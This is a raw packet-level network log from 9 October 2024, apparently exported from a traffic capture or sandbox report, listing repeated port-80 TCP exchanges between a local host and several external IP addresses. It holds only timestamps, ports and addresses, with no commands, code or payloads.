                                                                                        Oct 9, 2024 12:51:28.792375088 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.792376995 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:28.792387962 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.792391062 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:28.792402983 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.792416096 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.792424917 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:28.792424917 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:28.792427063 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.792438030 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:28.792442083 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.792450905 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:28.792454958 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.792465925 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:28.792469978 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.792479992 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:28.792490005 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:28.792526960 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:28.792927980 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.792939901 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.792951107 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.792962074 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.792973042 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.792973995 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:28.792984009 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.792988062 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:28.792996883 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.793001890 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:28.793009043 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.793016911 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:28.793023109 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.793030024 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:28.793035984 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.793042898 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:28.793049097 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.793056965 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:28.793060064 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.793067932 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:28.793071985 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.793081045 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:28.793085098 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.793097019 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:28.793100119 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.793113947 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:28.793133020 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:28.793215990 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:28.793715954 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.793726921 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.793739080 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.793750048 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.793756962 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:28.793761015 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.793770075 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:28.793773890 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.793781996 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:28.793787956 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.793797970 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:28.793800116 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.793812990 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.793817997 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:28.793826103 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.793833017 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:28.793838978 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.793845892 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:28.793849945 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.793859959 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:28.793864012 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.793874979 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.793875933 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:28.793891907 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:28.793911934 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:28.794125080 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:37.606451035 CEST4916580192.168.2.2252.13.151.179
                                                                                        Oct 9, 2024 12:51:37.611501932 CEST804916552.13.151.179192.168.2.22
                                                                                        Oct 9, 2024 12:51:37.611695051 CEST4916580192.168.2.2252.13.151.179
                                                                                        Oct 9, 2024 12:51:37.627902031 CEST4916580192.168.2.2252.13.151.179
                                                                                        Oct 9, 2024 12:51:37.632983923 CEST804916552.13.151.179192.168.2.22
                                                                                        Oct 9, 2024 12:51:37.633007050 CEST804916552.13.151.179192.168.2.22
                                                                                        Oct 9, 2024 12:51:37.633090973 CEST4916580192.168.2.2252.13.151.179
                                                                                        Oct 9, 2024 12:51:37.638044119 CEST804916552.13.151.179192.168.2.22
                                                                                        Oct 9, 2024 12:51:38.205492973 CEST804916552.13.151.179192.168.2.22
                                                                                        Oct 9, 2024 12:51:38.205526114 CEST804916552.13.151.179192.168.2.22
                                                                                        Oct 9, 2024 12:51:38.205538034 CEST804916552.13.151.179192.168.2.22
                                                                                        Oct 9, 2024 12:51:38.205689907 CEST4916580192.168.2.2252.13.151.179
                                                                                        Oct 9, 2024 12:51:39.142487049 CEST4916580192.168.2.2252.13.151.179
                                                                                        Oct 9, 2024 12:51:40.159085035 CEST4916680192.168.2.2252.13.151.179
                                                                                        Oct 9, 2024 12:51:40.163979053 CEST804916652.13.151.179192.168.2.22
                                                                                        Oct 9, 2024 12:51:40.164050102 CEST4916680192.168.2.2252.13.151.179
                                                                                        Oct 9, 2024 12:51:40.174690962 CEST4916680192.168.2.2252.13.151.179
                                                                                        Oct 9, 2024 12:51:40.179730892 CEST804916652.13.151.179192.168.2.22
                                                                                        Oct 9, 2024 12:51:40.764692068 CEST804916652.13.151.179192.168.2.22
                                                                                        Oct 9, 2024 12:51:40.764708996 CEST804916652.13.151.179192.168.2.22
                                                                                        Oct 9, 2024 12:51:40.764743090 CEST804916652.13.151.179192.168.2.22
                                                                                        Oct 9, 2024 12:51:40.764812946 CEST4916680192.168.2.2252.13.151.179
                                                                                        Oct 9, 2024 12:51:40.765094995 CEST4916680192.168.2.2252.13.151.179
                                                                                        Oct 9, 2024 12:51:41.695471048 CEST4916680192.168.2.2252.13.151.179
                                                                                        Oct 9, 2024 12:51:42.701998949 CEST4916780192.168.2.2252.13.151.179
                                                                                        Oct 9, 2024 12:51:42.707035065 CEST804916752.13.151.179192.168.2.22
                                                                                        Oct 9, 2024 12:51:42.707139015 CEST4916780192.168.2.2252.13.151.179
                                                                                        Oct 9, 2024 12:51:42.729895115 CEST4916780192.168.2.2252.13.151.179
                                                                                        Oct 9, 2024 12:51:42.734940052 CEST804916752.13.151.179192.168.2.22
                                                                                        Oct 9, 2024 12:51:42.735001087 CEST804916752.13.151.179192.168.2.22
                                                                                        Oct 9, 2024 12:51:42.735042095 CEST4916780192.168.2.2252.13.151.179
                                                                                        Oct 9, 2024 12:51:42.740534067 CEST804916752.13.151.179192.168.2.22
                                                                                        Oct 9, 2024 12:51:42.740566969 CEST804916752.13.151.179192.168.2.22
                                                                                        Oct 9, 2024 12:51:43.335017920 CEST804916752.13.151.179192.168.2.22
                                                                                        Oct 9, 2024 12:51:43.335053921 CEST804916752.13.151.179192.168.2.22
                                                                                        Oct 9, 2024 12:51:43.335117102 CEST4916780192.168.2.2252.13.151.179
                                                                                        Oct 9, 2024 12:51:43.335504055 CEST804916752.13.151.179192.168.2.22
                                                                                        Oct 9, 2024 12:51:43.335585117 CEST4916780192.168.2.2252.13.151.179
                                                                                        Oct 9, 2024 12:51:44.243527889 CEST4916780192.168.2.2252.13.151.179
                                                                                        Oct 9, 2024 12:51:45.260380030 CEST4916880192.168.2.2252.13.151.179
                                                                                        Oct 9, 2024 12:51:45.265655041 CEST804916852.13.151.179192.168.2.22
                                                                                        Oct 9, 2024 12:51:45.265762091 CEST4916880192.168.2.2252.13.151.179
                                                                                        Oct 9, 2024 12:51:45.272986889 CEST4916880192.168.2.2252.13.151.179
                                                                                        Oct 9, 2024 12:51:45.277940989 CEST804916852.13.151.179192.168.2.22
                                                                                        Oct 9, 2024 12:51:45.868669033 CEST804916852.13.151.179192.168.2.22
                                                                                        Oct 9, 2024 12:51:45.868725061 CEST804916852.13.151.179192.168.2.22
                                                                                        Oct 9, 2024 12:51:45.868782997 CEST804916852.13.151.179192.168.2.22
                                                                                        Oct 9, 2024 12:51:45.868834019 CEST4916880192.168.2.2252.13.151.179
                                                                                        Oct 9, 2024 12:51:45.868872881 CEST4916880192.168.2.2252.13.151.179
                                                                                        Oct 9, 2024 12:51:45.871227026 CEST4916880192.168.2.2252.13.151.179
                                                                                        Oct 9, 2024 12:51:45.876280069 CEST804916852.13.151.179192.168.2.22
                                                                                        Oct 9, 2024 12:51:50.913602114 CEST4916980192.168.2.2284.32.84.32
                                                                                        Oct 9, 2024 12:51:50.920300961 CEST804916984.32.84.32192.168.2.22
                                                                                        Oct 9, 2024 12:51:50.920392036 CEST4916980192.168.2.2284.32.84.32
                                                                                        Oct 9, 2024 12:51:50.935633898 CEST4916980192.168.2.2284.32.84.32
                                                                                        Oct 9, 2024 12:51:50.940437078 CEST804916984.32.84.32192.168.2.22
                                                                                        Oct 9, 2024 12:51:50.940478086 CEST804916984.32.84.32192.168.2.22
                                                                                        Oct 9, 2024 12:51:50.940531969 CEST4916980192.168.2.2284.32.84.32
                                                                                        Oct 9, 2024 12:51:50.945337057 CEST804916984.32.84.32192.168.2.22
                                                                                        Oct 9, 2024 12:51:51.389596939 CEST804916984.32.84.32192.168.2.22
                                                                                        Oct 9, 2024 12:51:51.389729023 CEST4916980192.168.2.2284.32.84.32
                                                                                        Oct 9, 2024 12:51:52.465711117 CEST4916980192.168.2.2284.32.84.32
                                                                                        Oct 9, 2024 12:51:52.854659081 CEST4916980192.168.2.2284.32.84.32
                                                                                        Oct 9, 2024 12:51:53.028331995 CEST804916984.32.84.32192.168.2.22
                                                                                        Oct 9, 2024 12:51:53.029195070 CEST804916984.32.84.32192.168.2.22
                                                                                        Oct 9, 2024 12:51:53.029294968 CEST4916980192.168.2.2284.32.84.32
                                                                                        Oct 9, 2024 12:51:53.481667995 CEST4917080192.168.2.2284.32.84.32
                                                                                        Oct 9, 2024 12:51:53.486748934 CEST804917084.32.84.32192.168.2.22
                                                                                        Oct 9, 2024 12:51:53.486840010 CEST4917080192.168.2.2284.32.84.32
                                                                                        Oct 9, 2024 12:51:53.497941017 CEST4917080192.168.2.2284.32.84.32
                                                                                        Oct 9, 2024 12:51:53.502832890 CEST804917084.32.84.32192.168.2.22
                                                                                        Oct 9, 2024 12:51:53.962920904 CEST804917084.32.84.32192.168.2.22
                                                                                        Oct 9, 2024 12:51:53.963057995 CEST4917080192.168.2.2284.32.84.32
                                                                                        Oct 9, 2024 12:51:55.007575989 CEST4917080192.168.2.2284.32.84.32
                                                                                        Oct 9, 2024 12:51:55.012558937 CEST804917084.32.84.32192.168.2.22
                                                                                        Oct 9, 2024 12:51:56.024363995 CEST4917180192.168.2.2284.32.84.32
                                                                                        Oct 9, 2024 12:51:56.029227018 CEST804917184.32.84.32192.168.2.22
                                                                                        Oct 9, 2024 12:51:56.029352903 CEST4917180192.168.2.2284.32.84.32
                                                                                        Oct 9, 2024 12:51:56.209793091 CEST4917180192.168.2.2284.32.84.32
                                                                                        Oct 9, 2024 12:51:56.214761972 CEST804917184.32.84.32192.168.2.22
                                                                                        Oct 9, 2024 12:51:56.214793921 CEST804917184.32.84.32192.168.2.22
                                                                                        Oct 9, 2024 12:51:56.214865923 CEST4917180192.168.2.2284.32.84.32
                                                                                        Oct 9, 2024 12:51:56.219708920 CEST804917184.32.84.32192.168.2.22
                                                                                        Oct 9, 2024 12:51:56.219743013 CEST804917184.32.84.32192.168.2.22
                                                                                        Oct 9, 2024 12:51:56.486074924 CEST804917184.32.84.32192.168.2.22
                                                                                        Oct 9, 2024 12:51:56.486191988 CEST4917180192.168.2.2284.32.84.32
                                                                                        Oct 9, 2024 12:51:57.721998930 CEST4917180192.168.2.2284.32.84.32
                                                                                        Oct 9, 2024 12:51:57.726764917 CEST804917184.32.84.32192.168.2.22
                                                                                        Oct 9, 2024 12:51:58.744684935 CEST4917280192.168.2.2284.32.84.32
                                                                                        Oct 9, 2024 12:51:58.749640942 CEST804917284.32.84.32192.168.2.22
                                                                                        Oct 9, 2024 12:51:58.749716043 CEST4917280192.168.2.2284.32.84.32
                                                                                        Oct 9, 2024 12:51:58.757220984 CEST4917280192.168.2.2284.32.84.32
                                                                                        Oct 9, 2024 12:51:58.762120008 CEST804917284.32.84.32192.168.2.22
                                                                                        Oct 9, 2024 12:51:59.210268021 CEST804917284.32.84.32192.168.2.22
                                                                                        Oct 9, 2024 12:51:59.210295916 CEST804917284.32.84.32192.168.2.22
                                                                                        Oct 9, 2024 12:51:59.210308075 CEST804917284.32.84.32192.168.2.22
                                                                                        Oct 9, 2024 12:51:59.210393906 CEST4917280192.168.2.2284.32.84.32
                                                                                        Oct 9, 2024 12:51:59.210453033 CEST804917284.32.84.32192.168.2.22
                                                                                        Oct 9, 2024 12:51:59.210464954 CEST804917284.32.84.32192.168.2.22
                                                                                        Oct 9, 2024 12:51:59.210479021 CEST804917284.32.84.32192.168.2.22
                                                                                        Oct 9, 2024 12:51:59.210562944 CEST4917280192.168.2.2284.32.84.32
                                                                                        Oct 9, 2024 12:51:59.210578918 CEST804917284.32.84.32192.168.2.22
                                                                                        Oct 9, 2024 12:51:59.210592031 CEST804917284.32.84.32192.168.2.22
                                                                                        Oct 9, 2024 12:51:59.210623980 CEST4917280192.168.2.2284.32.84.32
                                                                                        Oct 9, 2024 12:51:59.210664034 CEST804917284.32.84.32192.168.2.22
                                                                                        Oct 9, 2024 12:51:59.210675955 CEST804917284.32.84.32192.168.2.22
                                                                                        Oct 9, 2024 12:51:59.210707903 CEST4917280192.168.2.2284.32.84.32
                                                                                        Oct 9, 2024 12:51:59.219336987 CEST4917280192.168.2.2284.32.84.32
                                                                                        Oct 9, 2024 12:51:59.224356890 CEST804917284.32.84.32192.168.2.22
                                                                                        Oct 9, 2024 12:52:04.615034103 CEST4917380192.168.2.22103.106.67.112
                                                                                        Oct 9, 2024 12:52:04.619982958 CEST8049173103.106.67.112192.168.2.22
                                                                                        Oct 9, 2024 12:52:04.620048046 CEST4917380192.168.2.22103.106.67.112
                                                                                        Oct 9, 2024 12:52:04.630999088 CEST4917380192.168.2.22103.106.67.112
                                                                                        Oct 9, 2024 12:52:04.635823011 CEST8049173103.106.67.112192.168.2.22
                                                                                        Oct 9, 2024 12:52:04.635890007 CEST4917380192.168.2.22103.106.67.112
                                                                                        Oct 9, 2024 12:52:04.635932922 CEST8049173103.106.67.112192.168.2.22
                                                                                        Oct 9, 2024 12:52:04.640651941 CEST8049173103.106.67.112192.168.2.22
                                                                                        Oct 9, 2024 12:52:05.278455019 CEST8049173103.106.67.112192.168.2.22
                                                                                        Oct 9, 2024 12:52:05.278484106 CEST8049173103.106.67.112192.168.2.22
                                                                                        Oct 9, 2024 12:52:05.278544903 CEST4917380192.168.2.22103.106.67.112
                                                                                        Oct 9, 2024 12:52:06.130945921 CEST4917380192.168.2.22103.106.67.112
                                                                                        Oct 9, 2024 12:52:07.154289961 CEST4917480192.168.2.22103.106.67.112
                                                                                        Oct 9, 2024 12:52:07.159228086 CEST8049174103.106.67.112192.168.2.22
                                                                                        Oct 9, 2024 12:52:07.159408092 CEST4917480192.168.2.22103.106.67.112
                                                                                        Oct 9, 2024 12:52:07.180661917 CEST4917480192.168.2.22103.106.67.112
                                                                                        Oct 9, 2024 12:52:07.185676098 CEST8049174103.106.67.112192.168.2.22
                                                                                        Oct 9, 2024 12:52:07.816772938 CEST8049174103.106.67.112192.168.2.22
                                                                                        Oct 9, 2024 12:52:07.816881895 CEST8049174103.106.67.112192.168.2.22
                                                                                        Oct 9, 2024 12:52:07.816945076 CEST4917480192.168.2.22103.106.67.112
                                                                                        Oct 9, 2024 12:52:08.688787937 CEST4917480192.168.2.22103.106.67.112
                                                                                        Oct 9, 2024 12:52:09.705921888 CEST4917580192.168.2.22103.106.67.112
                                                                                        Oct 9, 2024 12:52:09.711020947 CEST8049175103.106.67.112192.168.2.22
                                                                                        Oct 9, 2024 12:52:09.711096048 CEST4917580192.168.2.22103.106.67.112
                                                                                        Oct 9, 2024 12:52:09.722563028 CEST4917580192.168.2.22103.106.67.112
                                                                                        Oct 9, 2024 12:52:09.727638006 CEST8049175103.106.67.112192.168.2.22
                                                                                        Oct 9, 2024 12:52:09.727648973 CEST8049175103.106.67.112192.168.2.22
                                                                                        Oct 9, 2024 12:52:09.727711916 CEST4917580192.168.2.22103.106.67.112
                                                                                        Oct 9, 2024 12:52:09.732605934 CEST8049175103.106.67.112192.168.2.22
                                                                                        Oct 9, 2024 12:52:09.732615948 CEST8049175103.106.67.112192.168.2.22
                                                                                        Oct 9, 2024 12:52:10.417404890 CEST8049175103.106.67.112192.168.2.22
                                                                                        Oct 9, 2024 12:52:10.417443037 CEST8049175103.106.67.112192.168.2.22
                                                                                        Oct 9, 2024 12:52:10.417521954 CEST4917580192.168.2.22103.106.67.112
                                                                                        Oct 9, 2024 12:52:11.231790066 CEST4917580192.168.2.22103.106.67.112
                                                                                        Oct 9, 2024 12:52:12.255624056 CEST4917680192.168.2.22103.106.67.112
                                                                                        Oct 9, 2024 12:52:12.260577917 CEST8049176103.106.67.112192.168.2.22
                                                                                        Oct 9, 2024 12:52:12.260694027 CEST4917680192.168.2.22103.106.67.112
                                                                                        Oct 9, 2024 12:52:12.268048048 CEST4917680192.168.2.22103.106.67.112
                                                                                        Oct 9, 2024 12:52:12.272921085 CEST8049176103.106.67.112192.168.2.22
                                                                                        Oct 9, 2024 12:52:12.935909986 CEST8049176103.106.67.112192.168.2.22
                                                                                        Oct 9, 2024 12:52:12.936161041 CEST8049176103.106.67.112192.168.2.22
                                                                                        Oct 9, 2024 12:52:12.936213017 CEST4917680192.168.2.22103.106.67.112
                                                                                        Oct 9, 2024 12:52:12.940362930 CEST4917680192.168.2.22103.106.67.112
                                                                                        Oct 9, 2024 12:52:12.945554972 CEST8049176103.106.67.112192.168.2.22
                                                                                        Oct 9, 2024 12:52:17.964160919 CEST4917780192.168.2.22188.114.97.3
                                                                                        Oct 9, 2024 12:52:17.969194889 CEST8049177188.114.97.3192.168.2.22
                                                                                        Oct 9, 2024 12:52:17.969270945 CEST4917780192.168.2.22188.114.97.3
                                                                                        Oct 9, 2024 12:52:17.984448910 CEST4917780192.168.2.22188.114.97.3
                                                                                        Oct 9, 2024 12:52:17.989592075 CEST8049177188.114.97.3192.168.2.22
                                                                                        Oct 9, 2024 12:52:17.989603043 CEST8049177188.114.97.3192.168.2.22
                                                                                        Oct 9, 2024 12:52:17.989640951 CEST4917780192.168.2.22188.114.97.3
                                                                                        Oct 9, 2024 12:52:17.994498014 CEST8049177188.114.97.3192.168.2.22
                                                                                        Oct 9, 2024 12:52:18.954978943 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:52:18.960386038 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:52:18.966995955 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:52:19.483989954 CEST4917780192.168.2.22188.114.97.3
                                                                                        Oct 9, 2024 12:52:19.489181995 CEST8049177188.114.97.3192.168.2.22
                                                                                        Oct 9, 2024 12:52:19.489308119 CEST4917780192.168.2.22188.114.97.3
                                                                                        Oct 9, 2024 12:52:20.504972935 CEST4917880192.168.2.22188.114.97.3
                                                                                        Oct 9, 2024 12:52:20.510005951 CEST8049178188.114.97.3192.168.2.22
                                                                                        Oct 9, 2024 12:52:20.510061979 CEST4917880192.168.2.22188.114.97.3
                                                                                        Oct 9, 2024 12:52:20.525227070 CEST4917880192.168.2.22188.114.97.3
                                                                                        Oct 9, 2024 12:52:20.530220985 CEST8049178188.114.97.3192.168.2.22
                                                                                        Oct 9, 2024 12:52:22.056746960 CEST4917880192.168.2.22188.114.97.3
                                                                                        Oct 9, 2024 12:52:22.062195063 CEST8049178188.114.97.3192.168.2.22
                                                                                        Oct 9, 2024 12:52:22.062278032 CEST4917880192.168.2.22188.114.97.3
                                                                                        Oct 9, 2024 12:52:23.059299946 CEST4917980192.168.2.22188.114.97.3
                                                                                        Oct 9, 2024 12:52:23.064269066 CEST8049179188.114.97.3192.168.2.22
                                                                                        Oct 9, 2024 12:52:23.064362049 CEST4917980192.168.2.22188.114.97.3
                                                                                        Oct 9, 2024 12:52:23.075068951 CEST4917980192.168.2.22188.114.97.3
                                                                                        Oct 9, 2024 12:52:23.080466986 CEST8049179188.114.97.3192.168.2.22
                                                                                        Oct 9, 2024 12:52:23.080481052 CEST8049179188.114.97.3192.168.2.22
                                                                                        Oct 9, 2024 12:52:23.080526114 CEST4917980192.168.2.22188.114.97.3
                                                                                        Oct 9, 2024 12:52:23.088103056 CEST8049179188.114.97.3192.168.2.22
                                                                                        Oct 9, 2024 12:52:23.088129044 CEST8049179188.114.97.3192.168.2.22
                                                                                        Oct 9, 2024 12:52:24.585258961 CEST4917980192.168.2.22188.114.97.3
                                                                                        Oct 9, 2024 12:52:24.591048956 CEST8049179188.114.97.3192.168.2.22
                                                                                        Oct 9, 2024 12:52:24.591195107 CEST4917980192.168.2.22188.114.97.3
                                                                                        Oct 9, 2024 12:52:25.795167923 CEST4918080192.168.2.22188.114.97.3
                                                                                        Oct 9, 2024 12:52:25.800070047 CEST8049180188.114.97.3192.168.2.22
                                                                                        Oct 9, 2024 12:52:25.800131083 CEST4918080192.168.2.22188.114.97.3
                                                                                        Oct 9, 2024 12:52:25.808135033 CEST4918080192.168.2.22188.114.97.3
                                                                                        Oct 9, 2024 12:52:25.813031912 CEST8049180188.114.97.3192.168.2.22
                                                                                        Oct 9, 2024 12:53:05.029771090 CEST8049180188.114.97.3192.168.2.22
                                                                                        Oct 9, 2024 12:53:05.030154943 CEST8049180188.114.97.3192.168.2.22
                                                                                        Oct 9, 2024 12:53:05.030211926 CEST4918080192.168.2.22188.114.97.3
                                                                                        Oct 9, 2024 12:53:05.033094883 CEST4918080192.168.2.22188.114.97.3
                                                                                        Oct 9, 2024 12:53:05.039596081 CEST8049180188.114.97.3192.168.2.22
                                                                                        Oct 9, 2024 12:53:10.055238008 CEST4918180192.168.2.223.33.130.190
                                                                                        Oct 9, 2024 12:53:10.060164928 CEST80491813.33.130.190192.168.2.22
                                                                                        Oct 9, 2024 12:53:10.061064005 CEST4918180192.168.2.223.33.130.190
                                                                                        Oct 9, 2024 12:53:10.071788073 CEST4918180192.168.2.223.33.130.190
                                                                                        Oct 9, 2024 12:53:10.076695919 CEST80491813.33.130.190192.168.2.22
                                                                                        Oct 9, 2024 12:53:10.076762915 CEST80491813.33.130.190192.168.2.22
                                                                                        Oct 9, 2024 12:53:10.077300072 CEST4918180192.168.2.223.33.130.190
                                                                                        Oct 9, 2024 12:53:10.082146883 CEST80491813.33.130.190192.168.2.22
                                                                                        Oct 9, 2024 12:53:10.524730921 CEST80491813.33.130.190192.168.2.22
                                                                                        Oct 9, 2024 12:53:10.529613018 CEST4918180192.168.2.223.33.130.190
                                                                                        Oct 9, 2024 12:53:11.572550058 CEST4918180192.168.2.223.33.130.190
                                                                                        Oct 9, 2024 12:53:11.577416897 CEST80491813.33.130.190192.168.2.22
                                                                                        Oct 9, 2024 12:53:12.591125965 CEST4918280192.168.2.223.33.130.190
                                                                                        Oct 9, 2024 12:53:12.596155882 CEST80491823.33.130.190192.168.2.22
                                                                                        Oct 9, 2024 12:53:12.603406906 CEST4918280192.168.2.223.33.130.190
                                                                                        Oct 9, 2024 12:53:12.611421108 CEST4918280192.168.2.223.33.130.190
                                                                                        Oct 9, 2024 12:53:12.616271019 CEST80491823.33.130.190192.168.2.22
                                                                                        Oct 9, 2024 12:53:13.067871094 CEST80491823.33.130.190192.168.2.22
                                                                                        Oct 9, 2024 12:53:13.067929029 CEST4918280192.168.2.223.33.130.190
                                                                                        Oct 9, 2024 12:53:14.119112968 CEST4918280192.168.2.223.33.130.190
                                                                                        Oct 9, 2024 12:53:14.124607086 CEST80491823.33.130.190192.168.2.22
                                                                                        Oct 9, 2024 12:53:15.132293940 CEST4918380192.168.2.223.33.130.190
                                                                                        Oct 9, 2024 12:53:15.137229919 CEST80491833.33.130.190192.168.2.22
                                                                                        Oct 9, 2024 12:53:15.137301922 CEST4918380192.168.2.223.33.130.190
                                                                                        Oct 9, 2024 12:53:15.150227070 CEST4918380192.168.2.223.33.130.190
                                                                                        Oct 9, 2024 12:53:15.155153990 CEST80491833.33.130.190192.168.2.22
                                                                                        Oct 9, 2024 12:53:15.155209064 CEST80491833.33.130.190192.168.2.22
                                                                                        Oct 9, 2024 12:53:15.155215025 CEST4918380192.168.2.223.33.130.190
                                                                                        Oct 9, 2024 12:53:15.160057068 CEST80491833.33.130.190192.168.2.22
                                                                                        Oct 9, 2024 12:53:15.160079002 CEST80491833.33.130.190192.168.2.22
                                                                                        Oct 9, 2024 12:53:16.658154964 CEST4918380192.168.2.223.33.130.190
                                                                                        Oct 9, 2024 12:53:16.663820028 CEST80491833.33.130.190192.168.2.22
                                                                                        Oct 9, 2024 12:53:16.664074898 CEST4918380192.168.2.223.33.130.190
                                                                                        Oct 9, 2024 12:53:17.674586058 CEST4918480192.168.2.223.33.130.190
                                                                                        Oct 9, 2024 12:53:17.679433107 CEST80491843.33.130.190192.168.2.22
                                                                                        Oct 9, 2024 12:53:17.679491997 CEST4918480192.168.2.223.33.130.190
                                                                                        Oct 9, 2024 12:53:17.686117887 CEST4918480192.168.2.223.33.130.190
                                                                                        Oct 9, 2024 12:53:17.690932035 CEST80491843.33.130.190192.168.2.22
                                                                                        Oct 9, 2024 12:53:18.162281990 CEST80491843.33.130.190192.168.2.22
                                                                                        Oct 9, 2024 12:53:18.163280010 CEST80491843.33.130.190192.168.2.22
                                                                                        Oct 9, 2024 12:53:18.168317080 CEST4918480192.168.2.223.33.130.190
                                                                                        Oct 9, 2024 12:53:18.168317080 CEST4918480192.168.2.223.33.130.190
                                                                                        Oct 9, 2024 12:53:18.173243046 CEST80491843.33.130.190192.168.2.22
                                                                                        Oct 9, 2024 12:53:23.176925898 CEST4918580192.168.2.22217.70.184.50
                                                                                        Oct 9, 2024 12:53:23.181801081 CEST8049185217.70.184.50192.168.2.22
                                                                                        Oct 9, 2024 12:53:23.181878090 CEST4918580192.168.2.22217.70.184.50
                                                                                        Oct 9, 2024 12:53:23.192042112 CEST4918580192.168.2.22217.70.184.50
                                                                                        Oct 9, 2024 12:53:23.197005987 CEST8049185217.70.184.50192.168.2.22
                                                                                        Oct 9, 2024 12:53:23.197069883 CEST4918580192.168.2.22217.70.184.50
                                                                                        Oct 9, 2024 12:53:23.197366953 CEST8049185217.70.184.50192.168.2.22
                                                                                        Oct 9, 2024 12:53:23.201914072 CEST8049185217.70.184.50192.168.2.22
                                                                                        Oct 9, 2024 12:53:23.786201000 CEST8049185217.70.184.50192.168.2.22
                                                                                        Oct 9, 2024 12:53:23.786690950 CEST8049185217.70.184.50192.168.2.22
